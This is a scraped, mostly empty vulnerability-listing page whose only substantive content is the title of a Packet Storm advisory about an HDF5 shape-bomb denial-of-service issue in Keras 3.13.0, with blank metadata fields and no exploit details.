    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 Keras 3.13.0 HDF5 Shape Bomb Denial of Service_PACKETSTORM:219685

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply